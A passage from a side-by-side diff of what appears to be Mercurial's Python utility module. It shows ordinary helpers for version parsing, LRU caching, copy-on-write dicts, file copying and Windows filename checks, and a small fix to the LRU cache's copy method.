999 999 >>> versiontuple(v, 3)
1000 1000 (3, 6, None)
1001 1001 >>> versiontuple(v, 4)
1002 1002 (3, 6, None, None)
1003 1003
1004 1004 >>> v = b'3.9-rc'
1005 1005 >>> versiontuple(v, 2)
1006 1006 (3, 9)
1007 1007 >>> versiontuple(v, 3)
1008 1008 (3, 9, None)
1009 1009 >>> versiontuple(v, 4)
1010 1010 (3, 9, None, 'rc')
1011 1011
1012 1012 >>> v = b'3.9-rc+2-02a8fea4289b'
1013 1013 >>> versiontuple(v, 2)
1014 1014 (3, 9)
1015 1015 >>> versiontuple(v, 3)
1016 1016 (3, 9, None)
1017 1017 >>> versiontuple(v, 4)
1018 1018 (3, 9, None, 'rc+2-02a8fea4289b')
1019 1019
1020 1020 >>> versiontuple(b'4.6rc0')
1021 1021 (4, 6, None, 'rc0')
1022 1022 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1023 1023 (4, 6, None, 'rc0+12-425d55e54f98')
1024 1024 >>> versiontuple(b'.1.2.3')
1025 1025 (None, None, None, '.1.2.3')
1026 1026 >>> versiontuple(b'12.34..5')
1027 1027 (12, 34, None, '..5')
1028 1028 >>> versiontuple(b'1.2.3.4.5.6')
1029 1029 (1, 2, 3, '.4.5.6')
1030 1030 """
1031 1031 if not v:
1032 1032 v = version()
1033 1033 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1034 1034 if not m:
1035 1035 vparts, extra = '', v
1036 1036 elif m.group(2):
1037 1037 vparts, extra = m.groups()
1038 1038 else:
1039 1039 vparts, extra = m.group(1), None
1040 1040
1041 1041 vints = []
1042 1042 for i in vparts.split('.'):
1043 1043 try:
1044 1044 vints.append(int(i))
1045 1045 except ValueError:
1046 1046 break
1047 1047 # (3, 6) -> (3, 6, None)
1048 1048 while len(vints) < 3:
1049 1049 vints.append(None)
1050 1050
1051 1051 if n == 2:
1052 1052 return (vints[0], vints[1])
1053 1053 if n == 3:
1054 1054 return (vints[0], vints[1], vints[2])
1055 1055 if n == 4:
1056 1056 return (vints[0], vints[1], vints[2], extra)
1057 1057
1058 1058 def cachefunc(func):
1059 1059 '''cache the result of function calls'''
1060 1060 # XXX doesn't handle keywords args
1061 1061 if func.__code__.co_argcount == 0:
1062 1062 cache = []
1063 1063 def f():
1064 1064 if len(cache) == 0:
1065 1065 cache.append(func())
1066 1066 return cache[0]
1067 1067 return f
1068 1068 cache = {}
1069 1069 if func.__code__.co_argcount == 1:
1070 1070 # we gain a small amount of time because
1071 1071 # we don't need to pack/unpack the list
1072 1072 def f(arg):
1073 1073 if arg not in cache:
1074 1074 cache[arg] = func(arg)
1075 1075 return cache[arg]
1076 1076 else:
1077 1077 def f(*args):
1078 1078 if args not in cache:
1079 1079 cache[args] = func(*args)
1080 1080 return cache[args]
1081 1081
1082 1082 return f
1083 1083
1084 1084 class cow(object):
1085 1085 """helper class to make copy-on-write easier
1086 1086
1087 1087 Call preparewrite before doing any writes.
1088 1088 """
1089 1089
1090 1090 def preparewrite(self):
1091 1091 """call this before writes, return self or a copied new object"""
1092 1092 if getattr(self, '_copied', 0):
1093 1093 self._copied -= 1
1094 1094 return self.__class__(self)
1095 1095 return self
1096 1096
1097 1097 def copy(self):
1098 1098 """always do a cheap copy"""
1099 1099 self._copied = getattr(self, '_copied', 0) + 1
1100 1100 return self
1101 1101
1102 1102 class sortdict(collections.OrderedDict):
1103 1103 '''a simple sorted dictionary
1104 1104
1105 1105 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1106 1106 >>> d2 = d1.copy()
1107 1107 >>> d2
1108 1108 sortdict([('a', 0), ('b', 1)])
1109 1109 >>> d2.update([(b'a', 2)])
1110 1110 >>> list(d2.keys()) # should still be in last-set order
1111 1111 ['b', 'a']
1112 1112 '''
1113 1113
1114 1114 def __setitem__(self, key, value):
1115 1115 if key in self:
1116 1116 del self[key]
1117 1117 super(sortdict, self).__setitem__(key, value)
1118 1118
1119 1119 if pycompat.ispypy:
1120 1120 # __setitem__() isn't called as of PyPy 5.8.0
1121 1121 def update(self, src):
1122 1122 if isinstance(src, dict):
1123 1123 src = src.iteritems()
1124 1124 for k, v in src:
1125 1125 self[k] = v
1126 1126
1127 1127 class cowdict(cow, dict):
1128 1128 """copy-on-write dict
1129 1129
1130 1130 Be sure to call d = d.preparewrite() before writing to d.
1131 1131
1132 1132 >>> a = cowdict()
1133 1133 >>> a is a.preparewrite()
1134 1134 True
1135 1135 >>> b = a.copy()
1136 1136 >>> b is a
1137 1137 True
1138 1138 >>> c = b.copy()
1139 1139 >>> c is a
1140 1140 True
1141 1141 >>> a = a.preparewrite()
1142 1142 >>> b is a
1143 1143 False
1144 1144 >>> a is a.preparewrite()
1145 1145 True
1146 1146 >>> c = c.preparewrite()
1147 1147 >>> b is c
1148 1148 False
1149 1149 >>> b is b.preparewrite()
1150 1150 True
1151 1151 """
1152 1152
1153 1153 class cowsortdict(cow, sortdict):
1154 1154 """copy-on-write sortdict
1155 1155
1156 1156 Be sure to call d = d.preparewrite() before writing to d.
1157 1157 """
1158 1158
1159 1159 class transactional(object):
1160 1160 """Base class for making a transactional type into a context manager."""
1161 1161 __metaclass__ = abc.ABCMeta
1162 1162
1163 1163 @abc.abstractmethod
1164 1164 def close(self):
1165 1165 """Successfully closes the transaction."""
1166 1166
1167 1167 @abc.abstractmethod
1168 1168 def release(self):
1169 1169 """Marks the end of the transaction.
1170 1170
1171 1171 If the transaction has not been closed, it will be aborted.
1172 1172 """
1173 1173
1174 1174 def __enter__(self):
1175 1175 return self
1176 1176
1177 1177 def __exit__(self, exc_type, exc_val, exc_tb):
1178 1178 try:
1179 1179 if exc_type is None:
1180 1180 self.close()
1181 1181 finally:
1182 1182 self.release()
1183 1183
1184 1184 @contextlib.contextmanager
1185 1185 def acceptintervention(tr=None):
1186 1186 """A context manager that closes the transaction on InterventionRequired
1187 1187
1188 1188 If no transaction was provided, this simply runs the body and returns
1189 1189 """
1190 1190 if not tr:
1191 1191 yield
1192 1192 return
1193 1193 try:
1194 1194 yield
1195 1195 tr.close()
1196 1196 except error.InterventionRequired:
1197 1197 tr.close()
1198 1198 raise
1199 1199 finally:
1200 1200 tr.release()
1201 1201
1202 1202 @contextlib.contextmanager
1203 1203 def nullcontextmanager():
1204 1204 yield
1205 1205
1206 1206 class _lrucachenode(object):
1207 1207 """A node in a doubly linked list.
1208 1208
1209 1209 Holds a reference to nodes on either side as well as a key-value
1210 1210 pair for the dictionary entry.
1211 1211 """
1212 1212 __slots__ = (u'next', u'prev', u'key', u'value')
1213 1213
1214 1214 def __init__(self):
1215 1215 self.next = None
1216 1216 self.prev = None
1217 1217
1218 1218 self.key = _notset
1219 1219 self.value = None
1220 1220
1221 1221 def markempty(self):
1222 1222 """Mark the node as emptied."""
1223 1223 self.key = _notset
1224 1224
1225 1225 class lrucachedict(object):
1226 1226 """Dict that caches most recent accesses and sets.
1227 1227
1228 1228 The dict consists of an actual backing dict - indexed by original
1229 1229 key - and a doubly linked circular list defining the order of entries in
1230 1230 the cache.
1231 1231
1232 1232 The head node is the newest entry in the cache. If the cache is full,
1233 1233 we recycle head.prev and make it the new head. Cache accesses result in
1234 1234 the node being moved to before the existing head and being marked as the
1235 1235 new head node.
1236 1236 """
1237 1237 def __init__(self, max):
1238 1238 self._cache = {}
1239 1239
1240 1240 self._head = head = _lrucachenode()
1241 1241 head.prev = head
1242 1242 head.next = head
1243 1243 self._size = 1
1244 1244 self._capacity = max
1245 1245
1246 1246 def __len__(self):
1247 1247 return len(self._cache)
1248 1248
1249 1249 def __contains__(self, k):
1250 1250 return k in self._cache
1251 1251
1252 1252 def __iter__(self):
1253 1253 # We don't have to iterate in cache order, but why not.
1254 1254 n = self._head
1255 1255 for i in range(len(self._cache)):
1256 1256 yield n.key
1257 1257 n = n.next
1258 1258
1259 1259 def __getitem__(self, k):
1260 1260 node = self._cache[k]
1261 1261 self._movetohead(node)
1262 1262 return node.value
1263 1263
1264 1264 def __setitem__(self, k, v):
1265 1265 node = self._cache.get(k)
1266 1266 # Replace existing value and mark as newest.
1267 1267 if node is not None:
1268 1268 node.value = v
1269 1269 self._movetohead(node)
1270 1270 return
1271 1271
1272 1272 if self._size < self._capacity:
1273 1273 node = self._addcapacity()
1274 1274 else:
1275 1275 # Grab the last/oldest item.
1276 1276 node = self._head.prev
1277 1277
1278 1278 # At capacity. Kill the old entry.
1279 1279 if node.key is not _notset:
1280 1280 del self._cache[node.key]
1281 1281
1282 1282 node.key = k
1283 1283 node.value = v
1284 1284 self._cache[k] = node
1285 1285 # And mark it as newest entry. No need to adjust order since it
1286 1286 # is already self._head.prev.
1287 1287 self._head = node
1288 1288
1289 1289 def __delitem__(self, k):
1290 1290 node = self._cache.pop(k)
1291 1291 node.markempty()
1292 1292
1293 1293 # Temporarily mark as newest item before re-adjusting head to make
1294 1294 # this node the oldest item.
1295 1295 self._movetohead(node)
1296 1296 self._head = node.next
1297 1297
1298 1298 # Additional dict methods.
1299 1299
1300 1300 def get(self, k, default=None):
1301 1301 try:
1302 1302 return self._cache[k].value
1303 1303 except KeyError:
1304 1304 return default
1305 1305
1306 1306 def clear(self):
1307 1307 n = self._head
1308 1308 while n.key is not _notset:
1309 1309 n.markempty()
1310 1310 n = n.next
1311 1311
1312 1312 self._cache.clear()
1313 1313
1314 1314 def copy(self):
1315 1315 result = lrucachedict(self._capacity)
1316
1317 # We copy entries by iterating in oldest-to-newest order so the copy
1318 # has the correct ordering.
1319
1320 # Find the first non-empty entry.
1316 1321 n = self._head.prev
1317 # Iterate in oldest-to-newest order, so the copy has the right ordering
1322 while n.key is _notset and n is not self._head:
1323 n = n.prev
1324
1318 1325 for i in range(len(self._cache)):
1319 1326 result[n.key] = n.value
1320 1327 n = n.prev
1328
1321 1329 return result
1322 1330
1323 1331 def _movetohead(self, node):
1324 1332 """Mark a node as the newest, making it the new head.
1325 1333
1326 1334 When a node is accessed, it becomes the freshest entry in the LRU
1327 1335 list, which is denoted by self._head.
1328 1336
1329 1337 Visually, let's make ``N`` the new head node (* denotes head):
1330 1338
1331 1339 previous/oldest <-> head <-> next/next newest
1332 1340
1333 1341 ----<->--- A* ---<->-----
1334 1342 | |
1335 1343 E <-> D <-> N <-> C <-> B
1336 1344
1337 1345 To:
1338 1346
1339 1347 ----<->--- N* ---<->-----
1340 1348 | |
1341 1349 E <-> D <-> C <-> B <-> A
1342 1350
1343 1351 This requires the following moves:
1344 1352
1345 1353 C.next = D (node.prev.next = node.next)
1346 1354 D.prev = C (node.next.prev = node.prev)
1347 1355 E.next = N (head.prev.next = node)
1348 1356 N.prev = E (node.prev = head.prev)
1349 1357 N.next = A (node.next = head)
1350 1358 A.prev = N (head.prev = node)
1351 1359 """
1352 1360 head = self._head
1353 1361 # C.next = D
1354 1362 node.prev.next = node.next
1355 1363 # D.prev = C
1356 1364 node.next.prev = node.prev
1357 1365 # N.prev = E
1358 1366 node.prev = head.prev
1359 1367 # N.next = A
1360 1368 # It is tempting to do just "head" here, however if node is
1361 1369 # adjacent to head, this will do bad things.
1362 1370 node.next = head.prev.next
1363 1371 # E.next = N
1364 1372 node.next.prev = node
1365 1373 # A.prev = N
1366 1374 node.prev.next = node
1367 1375
1368 1376 self._head = node
1369 1377
1370 1378 def _addcapacity(self):
1371 1379 """Add a node to the circular linked list.
1372 1380
1373 1381 The new node is inserted before the head node.
1374 1382 """
1375 1383 head = self._head
1376 1384 node = _lrucachenode()
1377 1385 head.prev.next = node
1378 1386 node.prev = head.prev
1379 1387 node.next = head
1380 1388 head.prev = node
1381 1389 self._size += 1
1382 1390 return node
1383 1391
1384 1392 def lrucachefunc(func):
1385 1393 '''cache most recent results of function calls'''
1386 1394 cache = {}
1387 1395 order = collections.deque()
1388 1396 if func.__code__.co_argcount == 1:
1389 1397 def f(arg):
1390 1398 if arg not in cache:
1391 1399 if len(cache) > 20:
1392 1400 del cache[order.popleft()]
1393 1401 cache[arg] = func(arg)
1394 1402 else:
1395 1403 order.remove(arg)
1396 1404 order.append(arg)
1397 1405 return cache[arg]
1398 1406 else:
1399 1407 def f(*args):
1400 1408 if args not in cache:
1401 1409 if len(cache) > 20:
1402 1410 del cache[order.popleft()]
1403 1411 cache[args] = func(*args)
1404 1412 else:
1405 1413 order.remove(args)
1406 1414 order.append(args)
1407 1415 return cache[args]
1408 1416
1409 1417 return f
1410 1418
1411 1419 class propertycache(object):
1412 1420 def __init__(self, func):
1413 1421 self.func = func
1414 1422 self.name = func.__name__
1415 1423 def __get__(self, obj, type=None):
1416 1424 result = self.func(obj)
1417 1425 self.cachevalue(obj, result)
1418 1426 return result
1419 1427
1420 1428 def cachevalue(self, obj, value):
1421 1429 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1422 1430 obj.__dict__[self.name] = value
1423 1431
1424 1432 def clearcachedproperty(obj, prop):
1425 1433 '''clear a cached property value, if one has been set'''
1426 1434 if prop in obj.__dict__:
1427 1435 del obj.__dict__[prop]
1428 1436
1429 1437 def increasingchunks(source, min=1024, max=65536):
1430 1438 '''return no less than min bytes per chunk while data remains,
1431 1439 doubling min after each chunk until it reaches max'''
1432 1440 def log2(x):
1433 1441 if not x:
1434 1442 return 0
1435 1443 i = 0
1436 1444 while x:
1437 1445 x >>= 1
1438 1446 i += 1
1439 1447 return i - 1
1440 1448
1441 1449 buf = []
1442 1450 blen = 0
1443 1451 for chunk in source:
1444 1452 buf.append(chunk)
1445 1453 blen += len(chunk)
1446 1454 if blen >= min:
1447 1455 if min < max:
1448 1456 min = min << 1
1449 1457 nmin = 1 << log2(blen)
1450 1458 if nmin > min:
1451 1459 min = nmin
1452 1460 if min > max:
1453 1461 min = max
1454 1462 yield ''.join(buf)
1455 1463 blen = 0
1456 1464 buf = []
1457 1465 if buf:
1458 1466 yield ''.join(buf)
1459 1467
1460 1468 def always(fn):
1461 1469 return True
1462 1470
1463 1471 def never(fn):
1464 1472 return False
1465 1473
1466 1474 def nogc(func):
1467 1475 """disable garbage collector
1468 1476
1469 1477 Python's garbage collector triggers a GC each time a certain number of
1470 1478 container objects (the number being defined by gc.get_threshold()) are
1471 1479 allocated even when marked not to be tracked by the collector. Tracking has
1472 1480 no effect on when GCs are triggered, only on what objects the GC looks
1473 1481 into. As a workaround, disable GC while building complex (huge)
1474 1482 containers.
1475 1483
1476 1484 This garbage collector issue have been fixed in 2.7. But it still affect
1477 1485 CPython's performance.
1478 1486 """
1479 1487 def wrapper(*args, **kwargs):
1480 1488 gcenabled = gc.isenabled()
1481 1489 gc.disable()
1482 1490 try:
1483 1491 return func(*args, **kwargs)
1484 1492 finally:
1485 1493 if gcenabled:
1486 1494 gc.enable()
1487 1495 return wrapper
1488 1496
1489 1497 if pycompat.ispypy:
1490 1498 # PyPy runs slower with gc disabled
1491 1499 nogc = lambda x: x
1492 1500
1493 1501 def pathto(root, n1, n2):
1494 1502 '''return the relative path from one place to another.
1495 1503 root should use os.sep to separate directories
1496 1504 n1 should use os.sep to separate directories
1497 1505 n2 should use "/" to separate directories
1498 1506 returns an os.sep-separated path.
1499 1507
1500 1508 If n1 is a relative path, it's assumed it's
1501 1509 relative to root.
1502 1510 n2 should always be relative to root.
1503 1511 '''
1504 1512 if not n1:
1505 1513 return localpath(n2)
1506 1514 if os.path.isabs(n1):
1507 1515 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1508 1516 return os.path.join(root, localpath(n2))
1509 1517 n2 = '/'.join((pconvert(root), n2))
1510 1518 a, b = splitpath(n1), n2.split('/')
1511 1519 a.reverse()
1512 1520 b.reverse()
1513 1521 while a and b and a[-1] == b[-1]:
1514 1522 a.pop()
1515 1523 b.pop()
1516 1524 b.reverse()
1517 1525 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1518 1526
1519 1527 # the location of data files matching the source code
1520 1528 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1521 1529 # executable version (py2exe) doesn't support __file__
1522 1530 datapath = os.path.dirname(pycompat.sysexecutable)
1523 1531 else:
1524 1532 datapath = os.path.dirname(pycompat.fsencode(__file__))
1525 1533
1526 1534 i18n.setdatapath(datapath)
1527 1535
1528 1536 def checksignature(func):
1529 1537 '''wrap a function with code to check for calling errors'''
1530 1538 def check(*args, **kwargs):
1531 1539 try:
1532 1540 return func(*args, **kwargs)
1533 1541 except TypeError:
1534 1542 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1535 1543 raise error.SignatureError
1536 1544 raise
1537 1545
1538 1546 return check
1539 1547
1540 1548 # a whilelist of known filesystems where hardlink works reliably
1541 1549 _hardlinkfswhitelist = {
1542 1550 'apfs',
1543 1551 'btrfs',
1544 1552 'ext2',
1545 1553 'ext3',
1546 1554 'ext4',
1547 1555 'hfs',
1548 1556 'jfs',
1549 1557 'NTFS',
1550 1558 'reiserfs',
1551 1559 'tmpfs',
1552 1560 'ufs',
1553 1561 'xfs',
1554 1562 'zfs',
1555 1563 }
1556 1564
1557 1565 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1558 1566 '''copy a file, preserving mode and optionally other stat info like
1559 1567 atime/mtime
1560 1568
1561 1569 checkambig argument is used with filestat, and is useful only if
1562 1570 destination file is guarded by any lock (e.g. repo.lock or
1563 1571 repo.wlock).
1564 1572
1565 1573 copystat and checkambig should be exclusive.
1566 1574 '''
1567 1575 assert not (copystat and checkambig)
1568 1576 oldstat = None
1569 1577 if os.path.lexists(dest):
1570 1578 if checkambig:
1571 1579 oldstat = checkambig and filestat.frompath(dest)
1572 1580 unlink(dest)
1573 1581 if hardlink:
1574 1582 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1575 1583 # unless we are confident that dest is on a whitelisted filesystem.
1576 1584 try:
1577 1585 fstype = getfstype(os.path.dirname(dest))
1578 1586 except OSError:
1579 1587 fstype = None
1580 1588 if fstype not in _hardlinkfswhitelist:
1581 1589 hardlink = False
1582 1590 if hardlink:
1583 1591 try:
1584 1592 oslink(src, dest)
1585 1593 return
1586 1594 except (IOError, OSError):
1587 1595 pass # fall back to normal copy
1588 1596 if os.path.islink(src):
1589 1597 os.symlink(os.readlink(src), dest)
1590 1598 # copytime is ignored for symlinks, but in general copytime isn't needed
1591 1599 # for them anyway
1592 1600 else:
1593 1601 try:
1594 1602 shutil.copyfile(src, dest)
1595 1603 if copystat:
1596 1604 # copystat also copies mode
1597 1605 shutil.copystat(src, dest)
1598 1606 else:
1599 1607 shutil.copymode(src, dest)
1600 1608 if oldstat and oldstat.stat:
1601 1609 newstat = filestat.frompath(dest)
1602 1610 if newstat.isambig(oldstat):
1603 1611 # stat of copied file is ambiguous to original one
1604 1612 advanced = (
1605 1613 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1606 1614 os.utime(dest, (advanced, advanced))
1607 1615 except shutil.Error as inst:
1608 1616 raise error.Abort(str(inst))
1609 1617
1610 1618 def copyfiles(src, dst, hardlink=None, progress=None):
1611 1619 """Copy a directory tree using hardlinks if possible."""
1612 1620 num = 0
1613 1621
1614 1622 def settopic():
1615 1623 if progress:
1616 1624 progress.topic = _('linking') if hardlink else _('copying')
1617 1625
1618 1626 if os.path.isdir(src):
1619 1627 if hardlink is None:
1620 1628 hardlink = (os.stat(src).st_dev ==
1621 1629 os.stat(os.path.dirname(dst)).st_dev)
1622 1630 settopic()
1623 1631 os.mkdir(dst)
1624 1632 for name, kind in listdir(src):
1625 1633 srcname = os.path.join(src, name)
1626 1634 dstname = os.path.join(dst, name)
1627 1635 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1628 1636 num += n
1629 1637 else:
1630 1638 if hardlink is None:
1631 1639 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1632 1640 os.stat(os.path.dirname(dst)).st_dev)
1633 1641 settopic()
1634 1642
1635 1643 if hardlink:
1636 1644 try:
1637 1645 oslink(src, dst)
1638 1646 except (IOError, OSError):
1639 1647 hardlink = False
1640 1648 shutil.copy(src, dst)
1641 1649 else:
1642 1650 shutil.copy(src, dst)
1643 1651 num += 1
1644 1652 if progress:
1645 1653 progress.increment()
1646 1654
1647 1655 return hardlink, num
1648 1656
1649 1657 _winreservednames = {
1650 1658 'con', 'prn', 'aux', 'nul',
1651 1659 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1652 1660 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1653 1661 }
1654 1662 _winreservedchars = ':*?"<>|'
1655 1663 def checkwinfilename(path):
1656 1664 r'''Check that the base-relative path is a valid filename on Windows.
1657 1665 Returns None if the path is ok, or a UI string describing the problem.
1658 1666
1659 1667 >>> checkwinfilename(b"just/a/normal/path")
1660 1668 >>> checkwinfilename(b"foo/bar/con.xml")
1661 1669 "filename contains 'con', which is reserved on Windows"
1662 1670 >>> checkwinfilename(b"foo/con.xml/bar")
1663 1671 "filename contains 'con', which is reserved on Windows"
1664 1672 >>> checkwinfilename(b"foo/bar/xml.con")
1665 1673 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1666 1674 "filename contains 'AUX', which is reserved on Windows"
1667 1675 >>> checkwinfilename(b"foo/bar/bla:.txt")
1668 1676 "filename contains ':', which is reserved on Windows"
1669 1677 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1670 1678 "filename contains '\\x07', which is invalid on Windows"
1671 1679 >>> checkwinfilename(b"foo/bar/bla ")
1672 1680 "filename ends with ' ', which is not allowed on Windows"
1673 1681 >>> checkwinfilename(b"../bar")
1674 1682 >>> checkwinfilename(b"foo\\")
1675 1683 "filename ends with '\\', which is invalid on Windows"
1676 1684 >>> checkwinfilename(b"foo\\/bar")
1677 1685 "directory name ends with '\\', which is invalid on Windows"
1678 1686 '''
1679 1687 if path.endswith('\\'):
1680 1688 return _("filename ends with '\\', which is invalid on Windows")
1681 1689 if '\\/' in path:
1682 1690 return _("directory name ends with '\\', which is invalid on Windows")
1683 1691 for n in path.replace('\\', '/').split('/'):
1684 1692 if not n:
1685 1693 continue
1686 1694 for c in _filenamebytestr(n):
1687 1695 if c in _winreservedchars:
1688 1696 return _("filename contains '%s', which is reserved "
1689 1697 "on Windows") % c
1690 1698 if ord(c) <= 31:
1691 1699 return _("filename contains '%s', which is invalid "
1692 1700 "on Windows") % stringutil.escapestr(c)
1693 1701 base = n.split('.')[0]
1694 1702 if base and base.lower() in _winreservednames:
1695 1703 return _("filename contains '%s', which is reserved "
1696 1704 "on Windows") % base
1697 1705 t = n[-1:]
1698 1706 if t in '. ' and n not in '..':
1699 1707 return _("filename ends with '%s', which is not allowed "
1700 1708 "on Windows") % t
1701 1709
1702 1710 if pycompat.iswindows:
1703 1711 checkosfilename = checkwinfilename
1704 1712 timer = time.clock
1705 1713 else:
1706 1714 checkosfilename = platform.checkosfilename
1707 1715 timer = time.time
1708 1716
1709 1717 if safehasattr(time, "perf_counter"):
1710 1718 timer = time.perf_counter
1711 1719
1712 1720 def makelock(info, pathname):
1713 1721 """Create a lock file atomically if possible
1714 1722
1715 1723 This may leave a stale lock file if symlink isn't supported and signal
1716 1724 interrupt is enabled.
1717 1725 """
1718 1726 try:
1719 1727 return os.symlink(info, pathname)
1720 1728 except OSError as why:
1721 1729 if why.errno == errno.EEXIST:
1722 1730 raise
1723 1731 except AttributeError: # no symlink in os
1724 1732 pass
1725 1733
1726 1734 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1727 1735 ld = os.open(pathname, flags)
1728 1736 os.write(ld, info)
1729 1737 os.close(ld)
1730 1738
1731 1739 def readlock(pathname):
1732 1740 try:
1733 1741 return os.readlink(pathname)
1734 1742 except OSError as why:
1735 1743 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1736 1744 raise
1737 1745 except AttributeError: # no symlink in os
1738 1746 pass
1739 1747 fp = posixfile(pathname, 'rb')
1740 1748 r = fp.read()
1741 1749 fp.close()
1742 1750 return r
1743 1751
1744 1752 def fstat(fp):
1745 1753 '''stat file object that may not have fileno method.'''
1746 1754 try:
1747 1755 return os.fstat(fp.fileno())
1748 1756 except AttributeError:
1749 1757 return os.stat(fp.name)
1750 1758
1751 1759 # File system features
1752 1760
1753 1761 def fscasesensitive(path):
1754 1762 """
1755 1763 Return true if the given path is on a case-sensitive filesystem
1756 1764
1757 1765 Requires a path (like /foo/.hg) ending with a foldable final
1758 1766 directory component.
1759 1767 """
1760 1768 s1 = os.lstat(path)
1761 1769 d, b = os.path.split(path)
1762 1770 b2 = b.upper()
1763 1771 if b == b2:
1764 1772 b2 = b.lower()
1765 1773 if b == b2:
1766 1774 return True # no evidence against case sensitivity
1767 1775 p2 = os.path.join(d, b2)
1768 1776 try:
1769 1777 s2 = os.lstat(p2)
1770 1778 if s2 == s1:
1771 1779 return False
1772 1780 return True
1773 1781 except OSError:
1774 1782 return True
1775 1783
1776 1784 try:
1777 1785 import re2
1778 1786 _re2 = None
1779 1787 except ImportError:
1780 1788 _re2 = False
1781 1789
1782 1790 class _re(object):
1783 1791 def _checkre2(self):
1784 1792 global _re2
1785 1793 try:
1786 1794 # check if match works, see issue3964
1787 1795 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1788 1796 except ImportError:
1789 1797 _re2 = False
1790 1798
1791 1799 def compile(self, pat, flags=0):
1792 1800 '''Compile a regular expression, using re2 if possible
1793 1801
1794 1802 For best performance, use only re2-compatible regexp features. The
1795 1803 only flags from the re module that are re2-compatible are
1796 1804 IGNORECASE and MULTILINE.'''
1797 1805 if _re2 is None:
1798 1806 self._checkre2()
1799 1807 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1800 1808 if flags & remod.IGNORECASE:
1801 1809 pat = '(?i)' + pat
1802 1810 if flags & remod.MULTILINE:
1803 1811 pat = '(?m)' + pat
1804 1812 try:
1805 1813 return re2.compile(pat)
1806 1814 except re2.error:
1807 1815 pass
1808 1816 return remod.compile(pat, flags)
1809 1817
1810 1818 @propertycache
1811 1819 def escape(self):
1812 1820 '''Return the version of escape corresponding to self.compile.
1813 1821
1814 1822 This is imperfect because whether re2 or re is used for a particular
1815 1823 function depends on the flags, etc, but it's the best we can do.
1816 1824 '''
1817 1825 global _re2
1818 1826 if _re2 is None:
1819 1827 self._checkre2()
1820 1828 if _re2:
1821 1829 return re2.escape
1822 1830 else:
1823 1831 return remod.escape
1824 1832
1825 1833 re = _re()
1826 1834
1827 1835 _fspathcache = {}
1828 1836 def fspath(name, root):
1829 1837 '''Get name in the case stored in the filesystem
1830 1838
1831 1839 The name should be relative to root, and be normcase-ed for efficiency.
1832 1840
1833 1841 Note that this function is unnecessary, and should not be
1834 1842 called, for case-sensitive filesystems (simply because it's expensive).
1835 1843
1836 1844 The root should be normcase-ed, too.
1837 1845 '''
1838 1846 def _makefspathcacheentry(dir):
1839 1847 return dict((normcase(n), n) for n in os.listdir(dir))
1840 1848
1841 1849 seps = pycompat.ossep
1842 1850 if pycompat.osaltsep:
1843 1851 seps = seps + pycompat.osaltsep
1844 1852 # Protect backslashes. This gets silly very quickly.
1845 1853 seps.replace('\\','\\\\')
1846 1854 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1847 1855 dir = os.path.normpath(root)
1848 1856 result = []
1849 1857 for part, sep in pattern.findall(name):
1850 1858 if sep:
1851 1859 result.append(sep)
1852 1860 continue
1853 1861
1854 1862 if dir not in _fspathcache:
1855 1863 _fspathcache[dir] = _makefspathcacheentry(dir)
1856 1864 contents = _fspathcache[dir]
1857 1865
1858 1866 found = contents.get(part)
1859 1867 if not found:
1860 1868 # retry "once per directory" per "dirstate.walk" which
1861 1869 # may take place for each patches of "hg qpush", for example
1862 1870 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1863 1871 found = contents.get(part)
1864 1872
1865 1873 result.append(found or part)
1866 1874 dir = os.path.join(dir, part)
1867 1875
1868 1876 return ''.join(result)
1869 1877
1870 1878 def checknlink(testfile):
1871 1879 '''check whether hardlink count reporting works properly'''
1872 1880
1873 1881 # testfile may be open, so we need a separate file for checking to
1874 1882 # work around issue2543 (or testfile may get lost on Samba shares)
1875 1883 f1, f2, fp = None, None, None
1876 1884 try:
1877 1885 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1878 1886 suffix='1~', dir=os.path.dirname(testfile))
1879 1887 os.close(fd)
1880 1888 f2 = '%s2~' % f1[:-2]
1881 1889
1882 1890 oslink(f1, f2)
1883 1891 # nlinks() may behave differently for files on Windows shares if
1884 1892 # the file is open.
1885 1893 fp = posixfile(f2)
1886 1894 return nlinks(f2) > 1
1887 1895 except OSError:
1888 1896 return False
1889 1897 finally:
1890 1898 if fp is not None:
1891 1899 fp.close()
1892 1900 for f in (f1, f2):
1893 1901 try:
1894 1902 if f is not None:
1895 1903 os.unlink(f)
1896 1904 except OSError:
1897 1905 pass
1898 1906
1899 1907 def endswithsep(path):
1900 1908 '''Check path ends with os.sep or os.altsep.'''
1901 1909 return (path.endswith(pycompat.ossep)
1902 1910 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1903 1911
1904 1912 def splitpath(path):
1905 1913 '''Split path by os.sep.
1906 1914 Note that this function does not use os.altsep because this is
1907 1915 an alternative of simple "xxx.split(os.sep)".
1908 1916 It is recommended to use os.path.normpath() before using this
1909 1917 function if need.'''
1910 1918 return path.split(pycompat.ossep)
1911 1919
1912 1920 def mktempcopy(name, emptyok=False, createmode=None):
1913 1921 """Create a temporary file with the same contents from name
1914 1922
1915 1923 The permission bits are copied from the original file.
1916 1924
1917 1925 If the temporary file is going to be truncated immediately, you
1918 1926 can use emptyok=True as an optimization.
